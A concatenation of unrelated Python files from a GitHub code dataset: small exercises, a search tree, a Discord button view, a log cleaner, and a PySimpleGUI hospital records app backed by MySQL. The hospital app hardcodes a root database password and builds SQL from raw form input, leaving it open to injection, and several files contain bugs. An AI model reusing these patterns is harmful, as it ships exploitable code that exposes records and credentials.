6098\nboard = [[0] * 10 for _ in range(10)]\nfor i in range(10):\n board[i] = list(map(int, input().split()))\n\nx = 1\ny = 1\n\nwhile True:\n if board[y][x] == 2:\n board[y][x] = 9\n break\n elif board[y][x + 1] !=1:\n board[y][x] = 9\n x +=1\n elif board[y + 1][x] !=1:\n board[y][x] = 9\n y +=1\n else:\n board[y][x] = 9\n break\n\nfor i in range(10):\n for j in range(10):\n print(board[i][j], end = \" \")\n print()\n\n ### commit test\n ","repo_name":"SooonChang/ps-solutions","sub_path":"codeup/python_basic_100/6092_6098.py","file_name":"6092_6098.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70921926509","text":"class SearchTree:\n\n def __init__(self, value=None):\n if value is None:\n self.baseNode = None\n else:\n self.baseNode = Node(value)\n\n def insert(self, value):\n if self.baseNode is not None:\n self.baseNode.insert(value)\n else:\n self.baseNode = Node(value)\n\n def find(self, value):\n if self.baseNode is not None:\n return self.baseNode.find(value)\n else:\n return None\n\n def delete(self, value):\n if self.baseNode is not None:\n if self.baseNode.value is value:\n # удаление baseNode\n if not self.baseNode.has_children():\n self.baseNode = None\n elif self.baseNode.has_one_child():\n if self.baseNode.left is not None:\n self.baseNode = self.baseNode.left\n else:\n self.baseNode = self.baseNode.right\n else:\n self.baseNode = self.baseNode.delete(value)\n else:\n self.baseNode.delete(value)\n\n def traverse(self):\n if self.baseNode is not None:\n self.baseNode.traverse()\n else:\n print('Empty')\n\n\nclass Node:\n\n def __init__(self, value, parent=None, left=None, right=None):\n self.parent = parent\n self.value = value\n self.left = left\n self.right = right\n\n def __str__(self):\n return '{}'.format(self.value)\n\n def insert(self, new_value):\n if self.value is not new_value:\n if new_value > self.value:\n if self.right is not None:\n self.right.insert(new_value)\n else:\n self.right = Node(new_value, self)\n elif new_value < self.value:\n if self.left is not None:\n self.left.insert(new_value)\n else:\n self.left = Node(new_value, self)\n else:\n print(new_value, \"already in tree\")\n\n def find(self, searching_value):\n result = None\n\n if self.value is searching_value:\n result = self\n else:\n if searching_value > self.value:\n if self.right is not None:\n result = self.right.find(searching_value)\n else:\n if self.left is not None:\n result = self.left.find(searching_value)\n\n return result\n\n def traverse(self):\n if self.left is not None:\n self.left.traverse()\n print(self.value)\n if self.right is not None:\n self.right.traverse()\n\n def delete(self, value_for_delete):\n\n node_for_delete = self.find(value_for_delete)\n\n if node_for_delete is not None:\n\n # удаление крайнего элемента(без child элементов)\n if not node_for_delete.has_children():\n\n if node_for_delete.is_left():\n node_for_delete.parent.left = None\n else:\n node_for_delete.parent.right = None\n\n # удаление элемена, имеющего 1 child элемент\n elif node_for_delete.has_one_child():\n\n if node_for_delete.is_left():\n\n if node_for_delete.left is not None:\n node_for_delete.parent.left, node_for_delete.left.parent = \\\n node_for_delete.left, node_for_delete.parent\n else:\n node_for_delete.parent.left, node_for_delete.right.parent = \\\n node_for_delete.right, node_for_delete.parent\n else:\n if node_for_delete.left is not None:\n node_for_delete.parent.right, node_for_delete.left.parent = \\\n node_for_delete.left, node_for_delete.parent\n else:\n node_for_delete.parent.right, node_for_delete.right.parent = \\\n node_for_delete.right, node_for_delete.parent\n\n # удаление элемента, имеющего оба child элемента\n else:\n # элемент, которым будет заменён удаляемый\n node_for_replace = node_for_delete.find_min_above()\n\n # ближайший элемент, который больше чем удаляемый - оказался его right child\n if node_for_delete.right is node_for_replace:\n node_for_replace.left = node_for_delete.left\n node_for_delete.left.parent = node_for_replace\n if node_for_delete.parent is None:\n # если удалялся baseNode - возвращается replace элемент для установки в кач-ве baseNode\n node_for_replace.parent = None\n return node_for_replace\n else:\n # если удалялся не baseNode\n if node_for_delete.is_left():\n node_for_delete.parent.left = node_for_replace\n node_for_replace.parent = node_for_delete.parent\n else:\n node_for_delete.parent.right = node_for_replace\n node_for_replace.parent = node_for_delete.parent\n\n else:\n if node_for_replace.right is not None:\n # если у replace елемента есть right child - отвязывается от replace элемента и привязывается\n # к replace.parent - в роли left child\n node_for_replace.parent.left = node_for_replace.right\n node_for_replace.right.parent = node_for_replace.parent\n\n # left и right от delete элемента переходят к replace элементу\n node_for_replace.left, node_for_replace.right = \\\n node_for_delete.left, node_for_delete.right\n node_for_delete.left.parent, node_for_delete.right.parent = \\\n node_for_replace, node_for_replace\n\n if node_for_delete.parent is None:\n # если удалялся baseNode - возвращается replace элемент для установки в кач-ве baseNode\n node_for_replace.parent = None\n return node_for_replace\n else:\n # иначе replace привязывается к delete.parent\n if node_for_delete.is_left():\n node_for_delete.parent.left = node_for_replace\n else:\n node_for_delete.parent.right = node_for_replace\n\n def find_min_above(self):\n min_above = self.right\n while min_above.left is not None:\n min_above = min_above.left\n return min_above\n\n def has_one_child(self):\n return ((self.left is not None) and (self.right is None)) or ((self.left is None) and (self.right is not None))\n\n def is_left(self):\n return self.parent.left is self\n\n def has_children(self):\n return self.left or self.right is not None\n","repo_name":"SergeyKurmenev/searchTree","sub_path":"searchTree.py","file_name":"searchTree.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41818401880","text":"# Recebe uma lista de alunos e todas suas notas\n# retorna a media de notar de um aluno pesquisado\n\nn = int(input())\n\nstudent_marks = {}\n\nfor _ in range(n):\n name, *line = input().split()\n scores = list(map(float, line))\n student_marks[name] = scores\n\nquery_name = input()\n\naverage = 0\n\nfor i in student_marks[query_name]:\n average += i\n\naverage /= 3\n\nprint(\"%.2f\" % average)\n","repo_name":"pedroportilho/hacker-rank-python","sub_path":"exercises/11_finding_the_percentage.py","file_name":"11_finding_the_percentage.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17797296365","text":"import PySimpleGUI as sg\r\nimport mysql.connector\r\n\r\ndbms = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"Dc762019\",\r\n database=\"hope_hosp\")\r\nmyCursor = dbms.cursor()\r\n\r\nsg.theme('Black')\r\nsg.set_options(font='Courier 16')\r\n\r\nPatientsData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.PATIENT\")\r\nfor i in myCursor:\r\n PatientsData.append(list(i))\r\nheadersPatients = ['PatientID', 'FirstName', 'LastName', 'Phone', 'Gender', 'EmergencyContact', 'ConditionDetails',\r\n 'AdmissionDate']\r\n\r\nDepartmentData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.DEPARTMENT\")\r\nfor j in myCursor:\r\n DepartmentData.append(list(j))\r\nheadersDepartment = ['DepartmentID', 'DepatmentName', 'DepartmentHead', 'OfficeNumber', 'OfficePhone']\r\n\r\nDoctorsData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.DOCTOR\")\r\nfor k in myCursor:\r\n DepartmentData.append(list(k))\r\nheadersDoctor = ['DoctorID', 'Fristname', 'LastName', 'DepartmentID']\r\n\r\nNursesData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.NURSE\")\r\nfor l in myCursor:\r\n DepartmentData.append(list(l))\r\nheadersNurse = ['NurseID', 'FristName', 'LastName', 'DepartmentID']\r\n\r\nFacultyData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.FACULTY\")\r\nfor m in myCursor:\r\n DepartmentData.append(list(m))\r\nheadersFaculty = ['FacultyID', 'FirstName', 'LastName', 'DepartmentID']\r\n\r\n\r\n# functions that update new data on to the display tables on refreshing\r\ndef refresh_patients():\r\n dbms2 = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"Dc762019\",\r\n database=\"hope_hosp\")\r\n myCursor2 = dbms2.cursor()\r\n data = []\r\n myCursor2.execute(\"SELECT * FROM hope_hosp.patient;\")\r\n for j in myCursor2:\r\n data.append(list(j))\r\n window1['-table1-'].Update(values=data)\r\n sg.popup(\"Patients Updated\")\r\n\r\n\r\ndef refresh_departments():\r\n dbms2 = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"Dc762019\",\r\n database=\"hope_hosp\")\r\n myCursor2 = dbms2.cursor()\r\n data1 = []\r\n myCursor2.execute(\"SELECT * FROM hope_hosp.department;\")\r\n for j in myCursor2:\r\n data1.append(list(j))\r\n window1['-table2-'].Update(values=data1)\r\n sg.popup(\"Departments Updated\")\r\n\r\n\r\ndef refresh_doctors():\r\n dbms2 = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"Dc762019\",\r\n database=\"hope_hosp\")\r\n myCursor2 = dbms2.cursor()\r\n data2 = []\r\n myCursor2.execute(\"SELECT * FROM hope_hosp.doctor;\")\r\n for j in myCursor2:\r\n data2.append(list(j))\r\n window1['-table3-'].Update(values=data2)\r\n sg.popup(\"Doctors Updated\")\r\n\r\n\r\ndef refresh_nurses():\r\n dbms2 = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"Dc762019\",\r\n database=\"hope_hosp\")\r\n myCursor2 = dbms2.cursor()\r\n data3 = []\r\n myCursor2.execute(\"SELECT * FROM hope_hosp.nurse;\")\r\n for j in myCursor2:\r\n data3.append(list(j))\r\n window1['-table4-'].Update(values=data3)\r\n sg.popup(\"Nurses Updated\")\r\n\r\n\r\ndef refresh_faculty():\r\n dbms2 = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"Dc762019\",\r\n database=\"hope_hosp\")\r\n myCursor2 = dbms2.cursor()\r\n data4 = []\r\n myCursor2.execute(\"SELECT * FROM hope_hosp.faculty;\")\r\n for j in myCursor2:\r\n data4.append(list(j))\r\n window1['-table5-'].Update(values=data4)\r\n sg.popup(\"Nurses Updated\")\r\n\r\n\r\n# clearing form functions\r\ndef clear_patients():\r\n for key in values:\r\n window1['FirstName'].update('')\r\n window1['LastName'].update('')\r\n window1['Phone'].update('')\r\n window1['Gender'].update('')\r\n window1['EmergencyContact'].update('')\r\n window1['ConditionDetails'].update('')\r\n window1['AdmissionDate'].update('')\r\n return None\r\n\r\n\r\ndef clear_departments():\r\n for key in values:\r\n window1['DepatmentName'].update('')\r\n window1['DepartmentHead'].update('')\r\n window1['OfficeNumber'].update('')\r\n window1['DepartmentPhone'].update('')\r\n return None\r\n\r\n\r\ndef clear_doctors():\r\n for key in values:\r\n window1['FristName'].update('')\r\n window1['LastName'].update('')\r\n window1['DepartmentID'].update('')\r\n return None\r\n\r\n\r\ndef clear_nurses():\r\n for key in values:\r\n window1['FristName'].update('')\r\n window1['LastName'].update('')\r\n window1['DepartmentID'].update('')\r\n return None\r\n\r\n\r\ndef clear_faculty():\r\n for key in values:\r\n window1['FirstName'].update('')\r\n window1['LastName'].update('')\r\n window1['DepartmentID'].update('')\r\n return None\r\n\r\n\r\n# Submitting functions\r\ndef submit_patient():\r\n FirstName = values['FirstName']\r\n if FirstName == '':\r\n sg.popup_error('Missing FirstName')\r\n LastName = values['LastName']\r\n if LastName == '':\r\n sg.popup_error('Missing LastName')\r\n Phone = values['Phone']\r\n if Phone == '':\r\n sg.popup_error('Missing Phone')\r\n Gender = values['Gender']\r\n if Gender == '':\r\n sg.popup_error('Missing Gender')\r\n EmergencyContact = values['EmergencyContact']\r\n if EmergencyContact == '':\r\n sg.popup_error('Missing EmergencyContact')\r\n ConditionDetails = values['ConditionDetails']\r\n if ConditionDetails == '':\r\n sg.popup_error('Missing Condition Details')\r\n AdmissionDate = values['AdmissionDate']\r\n if AdmissionDate == '':\r\n sg.popup_error('Missing Admission Date')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.patient(FirstName, LastName, Phone, Gender, EmergencyContact,\" \\\r\n \" ConditionDetails, AdmissionDate) VALUES (\" + \"'\" + values['FirstName'] + \"'\" + \", \" + \\\r\n \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" \\\r\n + values['Phone'] + \"'\" + \", \" + \"'\" + values['Gender'] + \"'\" + \", \" + \"'\" + values[\r\n 'EmergencyContact'] \\\r\n + \"'\" + \", \" + \"'\" + values['ConditionDetails'] + \"'\" + \", \" + \"'\" + values[\r\n 'AdmissionDate'] + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_patients()\r\n sg.popup_quick('Patient Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_department():\r\n DepatmentName = values['DepatmentName']\r\n if DepatmentName == '':\r\n sg.popup_error('Missing DepartmentName')\r\n DepartmentHead = values['DepartmentHead']\r\n if DepartmentHead == '':\r\n sg.popup_error('Missing DepartmentHead')\r\n OfficeNumber = values['OfficeNumber']\r\n if OfficeNumber == '':\r\n sg.popup_error('Missing OfficeNumber')\r\n DepartmentPhone = values['DepartmentPhone']\r\n if DepartmentPhone == '':\r\n sg.popup_error('Missing Department Phone')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.department(DepatmentName, DepartmentHead, OfficeNumber, DepartmentPhone) \" \\\r\n \"VALUES (\" + \"'\" + values['DepatmentName'] + \"'\" + \", \" + \\\r\n \"'\" + values['DepartmentHead'] + \"'\" + \", \" + \"'\" + values['OfficeNumber'] + \"'\" + \", \" + \"'\" + \\\r\n values['DepartmentPhone'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_departments()\r\n sg.popup_quick('Department Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_doctor():\r\n FristName = values['FristName']\r\n if FristName == '':\r\n sg.popup_error('Missing FirstName')\r\n LastName = values['LastName']\r\n if LastName == '':\r\n sg.popup_error('Missing LastName')\r\n DepartmentID = values['DepartmentID']\r\n if DepartmentID == '':\r\n sg.popup_error('Missing DepartmentID')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.doctor(FristName, LastName, DepartmentID) \" \\\r\n \"VALUES (\" + \"'\" + values['FristName'] + \"'\" + \", \" + \\\r\n \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" + values['DepartmentID'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_doctors()\r\n sg.popup_quick('Doctor Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_nurse():\r\n FristName = values['FristName']\r\n if FristName == '':\r\n sg.popup_error('Missing FirstName')\r\n LastName = values['LastName']\r\n if LastName == '':\r\n sg.popup_error('Missing LastName')\r\n DepartmentID = values['DepartmentID']\r\n if DepartmentID == '':\r\n sg.popup_error('Missing DepartmentID')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.nurse(FristName, LastName, DepartmentID) \" \\\r\n \"VALUES (\" + \"'\" + values['FristName'] + \"'\" + \", \" + \\\r\n \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" + values['DepartmentID'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_nurses()\r\n sg.popup_quick('Nurse Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_faculty():\r\n FirstName = values['FirstName']\r\n if FirstName == '':\r\n sg.popup_error('Missing FirstName')\r\n LastName = values['LastName']\r\n if LastName == '':\r\n sg.popup_error('Missing LastName')\r\n DepartmentID = values['DepartmentID']\r\n if DepartmentID == '':\r\n sg.popup_error('Missing DepartmentID')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.faculty(FirstName, LastName, DepartmentID) \" \\\r\n \"VALUES (\" + \"'\" + values['FirstName'] + \"'\" + \", \" + \\\r\n \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" + values['DepartmentID'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_faculty()\r\n sg.popup_quick('Faculty/Staff Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\n# GUI layouts\r\npatientTable_layout = [\r\n [sg.T('PATIENTS:')],\r\n [sg.Table(headings=headersPatients, values=PatientsData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table1-')],\r\n [sg.Button(\"Refresh Patients\", key='-refreshP-', expand_x=True)],\r\n [sg.Button(\"Exit\", expand_x=True)]\r\n]\r\ndepartmentTable_layout = [\r\n [sg.T('DEPARTMENTS:')],\r\n [sg.Table(headings=headersDepartment, values=DepartmentData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table2-')],\r\n [sg.Button(\"Refresh Departments\", key='-refreshD-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\ndoctorsTable_layout = [\r\n [sg.T('DOCTORS:')],\r\n [sg.Table(headings=headersDoctor, values=DoctorsData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table3-')],\r\n [sg.Button(\"Refresh Doctors\", key='-refreshDr-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\nnursesTable_layout = [\r\n [sg.T('NURSES:')],\r\n [sg.Table(headings=headersNurse, values=NursesData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table4-')],\r\n [sg.Button(\"Refresh Nurses\", key='-refreshNur-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\nfacultiesTable_layout = [\r\n [sg.T('FACULTY&STAFF:')],\r\n [sg.Table(headings=headersFaculty, values=FacultyData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table5-')],\r\n [sg.Button(\"Refresh Faculty\", key='-refreshF-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\n\r\nPatientForm_layout = [\r\n [sg.T('Patient File')],\r\n [sg.T('FirstName'), sg.Push(), sg.I(size=(30, 5), key='FirstName')],\r\n [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n [sg.T('Phone'), sg.Push(), sg.I(size=(30, 5), key='Phone')],\r\n [sg.T('Gender'), sg.Push(), sg.Combo(size=(30, 5), values=['Male', 'Female', 'Trans-sexual', 'Other'],\r\n key='Gender')],\r\n [sg.T('EmergencyContact'), sg.Push(), sg.I(size=(30, 5), key='EmergencyContact')],\r\n [sg.T('Condition Details'), sg.Push(), sg.I(size=(50, 5), key='ConditionDetails')],\r\n [sg.T('AdmissionDate'), sg.Push(), sg.I(size=(30, 5), key='AdmissionDate')],\r\n [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\nDepartmentForm_layout = [\r\n [sg.T('Department File')],\r\n [sg.T('DepatmentName'), sg.Push(), sg.I(size=(30, 5), key='DepatmentName')],\r\n [sg.T('DepartmentHead'), sg.Push(), sg.I(size=(30, 5), key='DepartmentHead')],\r\n [sg.T('OfficeNumber'), sg.Push(), sg.I(size=(30, 5), key='OfficeNumber')],\r\n [sg.T('DepartmentPhone'), sg.Push(), sg.I(size=(30, 5), key='DepartmentPhone')],\r\n [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\nDoctorsForm_layout = [\r\n [sg.T('Doctors File:')],\r\n [sg.T('FristName'), sg.Push(), sg.I(size=(30, 5), key='FristName')],\r\n [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n [sg.T('DepartmentID'), sg.Push(), sg.I(size=(30, 5), key='DepartmentID')],\r\n [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\nNursesForm_layout = [\r\n [sg.T('Nurses File:')],\r\n [sg.T('FristName'), sg.Push(), sg.I(size=(30, 5), key='FristName')],\r\n [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n [sg.T('DepartmentID'), sg.Push(), sg.I(size=(30, 5), key='DepartmentID')],\r\n [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\nFacultyForm_layout = [\r\n [sg.T('Faculties File:')],\r\n [sg.T('FirstName'), sg.Push(), sg.I(size=(30, 5), key='FirstName')],\r\n [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n [sg.T('DepartmentID'), sg.Push(), sg.I(size=(30, 5), key='DepartmentID')],\r\n [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\n\r\nmain_layout = [\r\n [sg.Button('Display PATIENTS', key='-viewP-')],[sg.Button('Enter Patients', key='-enterP-')],\r\n [sg.Button('Display DEPARTMENTS', key='-viewD-')], [sg.Button('Department Registration', key='-enterD-')],\r\n [sg.Button('Display DOCTORS', key='-viewDr-')], [sg.Button('Doctor Registration', key='-enterDr-')],\r\n [sg.Button('Display NURSES', key='-viewN-')], [sg.Button('Nurses Registration', key='-enterN-')],\r\n [sg.Button('Display FACULTY', key='-viewF-')], [sg.Button('Enter Faculty', key='-enterF-')],\r\n [sg.Button('Exit', key='-exit-')]\r\n]\r\n\r\n# -MAIN-\r\nwhile True:\r\n window = sg.Window(\"HOPE HOSPITAL\", main_layout)\r\n event, values = window.read()\r\n if event in (sg.WIN_CLOSED or '-exit-'):\r\n break\r\n if event == '-viewP-':\r\n window1 = sg.Window(\"\", patientTable_layout)\r\n event, values = window1.read()\r\n if event == 'Exit':\r\n window1.close()\r\n if event == '-refreshP':\r\n refresh_patients()\r\n if event == '-enterP-':\r\n window1 = sg.Window(\"Patient Record Form\", PatientForm_layout)\r\n event, values = window1.read()\r\n if event == '-submit-':\r\n submit_patient()\r\n if event == '-clear-':\r\n clear_patients()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-viewD-':\r\n window1 = sg.Window(\"Departments:\", departmentTable_layout)\r\n event, values = window1.read()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-refreshD-':\r\n refresh_departments()\r\n if event == '-enterD-':\r\n window1 = sg.Window(\"Department File:\", DepartmentForm_layout)\r\n event, values = window1.read()\r\n if event == '-submit-':\r\n submit_department()\r\n if event == '-clear-':\r\n clear_departments()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-viewDr-':\r\n window1 = sg.Window(\"Doctors:\", doctorsTable_layout)\r\n event, values = window1.read()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-refreshDr-':\r\n refresh_doctors()\r\n if event == '-enterDr-':\r\n window1 = sg.Window(\"Doctors File:\", DoctorsForm_layout)\r\n event, values = window1.read()\r\n if event == '-submit-':\r\n submit_doctor()\r\n if event == '-clear-':\r\n clear_doctors()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-viewN-':\r\n window1 = sg.Window(\"Nurses:\", nursesTable_layout)\r\n event, values = window1.read()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-refreshNur-':\r\n refresh_nurses()\r\n if event == '-enterN-':\r\n window1 = sg.Window(\"Nurses File:\", NursesForm_layout)\r\n event, values = window1.read()\r\n if event == '-submit-':\r\n submit_nurse()\r\n if event == '-clear-':\r\n clear_nurses()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-viewF-':\r\n window1 = sg.Window(\"Faculty&Staff:\", facultiesTable_layout)\r\n event, values = window1.read()\r\n if event == '-exit-':\r\n window1.close()\r\n if event == '-refreshF-':\r\n refresh_faculty()\r\n if event == '-enterF-':\r\n window1 = sg.Window(\"Faculty&Staff:\", FacultyForm_layout)\r\n event, values = window1.read()\r\n if event == '-submit-':\r\n submit_faculty()\r\n if event == '-clear-':\r\n clear_faculty()\r\n if event == '-exit-':\r\n window1.close()\r\n\r\nwindow.close()\r\n","repo_name":"chesiredk/Mysql-projects","sub_path":"HopeHosp.py","file_name":"HopeHosp.py","file_ext":"py","file_size_in_byte":20041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12966051149","text":"import numpy as np\nimport math\nfrom scipy.misc import derivative\n\na = int(input(\"введіть а: \"))\nb = int(input(\"введіть b: \"))\ne = float(input(\"введіть e(точність): \"))\n\ndef f(x):\n return 3*x**4-4*x**3+x**2-2*x-3 \n\n\nif (f(a)*derivative(f, a, n = 2)>0):\n x0 = a\n xi = b\nelse:\n x0 = b\n xi = a\nxi_1 = xi-(xi - x0) * f(xi)/(f(xi) - f(x0))\n\nwhile (abs(xi_1 - xi) > e):\n xi = xi_1\n xi_1 = xi-(xi - x0) * f(xi)/(f(xi) - f(x0))\n\nprint(\"x = {}\".format(xi_1))","repo_name":"romanenko1s/NumericalMethodsOfProgramming","sub_path":"лр2/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20579515011","text":"import csv\nimport pickle\n\nhp = {}\nwith open(\"HP.csv\", \"r\") as f:\n reader = csv.reader(f)\n for line in reader:\n if line[0] == \"Class ID\":\n continue\n #if line[0] != line[1]:\n hp[line[0]] = line[1]\n\ntest = {}\nwith open(\"pmc2hp.csv\", \"r\") as f:\n reader = csv.reader(f)\n for line in reader:\n for i in line:\n if i == line[0]:\n test[i] = {}\n continue\n test[line[0]][i] = ''\n\nfor key in test.keys():\n for key1 in test[key].keys():\n test[key][key1] = hp[key1]\n #if test[key][key1] in hp.keys():\n # test[key][key1] = hp[key1]\n\nfor key, value in test.items():\n print(key, ' ', value)\n\nwith open('terms.pickle', 'wb') as handle:\n pickle.dump(test, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('terms.pickle', 'rb') as handle:\n new = pickle.load(handle)\n\nprint(new == test)\n\nfile = open('terms.txt', 'a')\nfile.write(test)\nfile.close()\n","repo_name":"hsbEdin/Dissertation","sub_path":"Dissertation/terms.py","file_name":"terms.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30444326054","text":"import discord\n\nclass ConfirmView(discord.ui.View):\n def __init__(self, author: discord.Member, timeout: float | None = 10) -> None:\n super().__init__(timeout=timeout)\n\n self.is_confirm: bool = False\n self.author: discord.Member = author\n self.message: discord.Message = None\n\n async def on_timeout(self) -> None:\n for child in self.children:\n child.disabled = True\n \n await self.message.edit(view=self)\n\n async def interaction_check(self, interaction: discord.Interaction) -> bool:\n return self.author == interaction.user\n \n @discord.ui.button(label=\"Confirm\", style=discord.ButtonStyle.green)\n async def confirm(self, interaction: discord.Interaction, button: discord.ui.Button):\n await interaction.response.defer()\n self.is_confirm = True\n await self.on_timeout()\n self.stop()","repo_name":"ChocoMeow/IUFI","sub_path":"views/confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73714336428","text":"#avoid cache\nimport sys \nsys.dont_write_bytecode = True\n\n\n#------------------------------------------------------------------------------------------------------------------------\n#import logger\nfrom Logs.GetTracebackLogs import *\nlogger.warning(\"Application Log Started\")\n\n\n\n\n#------------------------------------------------------------------------------------------------------------------------\n#import methods\nfrom MethFolder.methFile import *\n\ndef clickedYes():\n try:\n dir = txt1.get()\n logger.info(\"Main info - Entered directory: % s\" % dir)\n\n if is_admin():\n try:\n res=clearDir(dir)\n txt1.delete(0, END)\n #logger.info(\"Text box content has been reset\")\n\n #update log listbox\n try:\n fname=\".\\\\Logs\\\\tracebacklog.txt\"\n #READ LAST 10 LINES OF LOG FILE\n with open(\".\\\\Logs\\\\tracebacklog.txt\", 'r') as f:\n LinesCount = len(f.readlines())\n if LinesCount>10:\n #last 10 lines\n NumberOfLines=10\n lines = LastNlines(fname, NumberOfLines)\n #lb3.configure(text= lines)\n listbox.delete(0, END)\n for i in range (NumberOfLines-1, -1, -1): #counts 9 to 0 - reverse order, latest log first\n listbox.insert((NumberOfLines-1)-i, lines[i])\n #if logs are not 10 lines yet, do this instead\n else:\n #last lines\n NumberOfLines=LinesCount\n lines = LastNlines(fname, NumberOfLines)\n #lb3.configure(text= lines)\n listbox.delete(0, END)\n for i in range (NumberOfLines-1, -1, -1): #counts 9 to 0 - reverse order, latest log first\n listbox.insert((NumberOfLines-1)-i, lines[i])\n\n \n except Exception as e:\n logger.error(str(e))\n logger.error(traceback.format_exc())\n return res\n except Exception as e:\n logger.error(str(e))\n logger.error(traceback.format_exc())\n else:\n # Re-run the program with admin rights\n ctypes.windll.shell32.ShellExecuteW(None, \"runas\", sys.executable, \" \".join(sys.argv), None, 1)\n 